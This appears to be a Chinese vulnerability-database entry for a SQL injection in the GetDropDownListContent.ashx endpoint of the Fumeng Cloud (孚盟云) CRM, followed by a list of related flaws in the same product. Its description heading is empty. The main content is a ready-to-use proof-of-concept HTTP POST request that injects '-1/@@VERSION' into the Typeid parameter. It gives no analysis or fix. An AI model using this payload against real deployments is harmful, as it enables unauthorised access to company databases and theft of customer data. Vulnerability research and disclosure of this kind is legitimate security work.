孚盟云 GetDropDownListContent.ashx SQL注入漏洞

漏洞描述

PoC代码

POST /Ajax/GetDropDownListContent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=getType&Typeid=-1/@@VERSION

相关漏洞推荐

• 无POC孚盟云CRM ReportShow.aspx SQL 注入漏洞
• 无POC孚盟云 AjaxWriteMail.ashx SQL注入漏洞
• 无POC孚盟云 ReportShow.aspx SQL注入漏洞
• 无POC孚盟云 AjaxWriteMail.ashx 任意文件上传漏洞
• POC孚盟云 AjaxBusinessPrice.ashx SQL注入漏洞
• 无POC孚盟云CRM AjaxWriteMail.ashx 存在文件上传漏洞
• 无POC孚盟云 CRM /m/Dingding/Ajax/AjaxCoustomerShare.ashx SQL 注入漏洞
• POC孚盟云CRM AjaxProductTemplateList.ashx SQL注入漏洞
• 无POC孚盟云 GetPrdTemplate SQL注入漏洞
• 无POC孚盟云 DeletePrdTemplate SQL注入漏洞
• 无POC孚盟云 SendMail SQL注入漏洞
• 无POC孚盟云 AjaxProductFiled.ashx SQL注入漏洞
• 无POC孚盟云 AjaxContractList.ashx SQL注入漏洞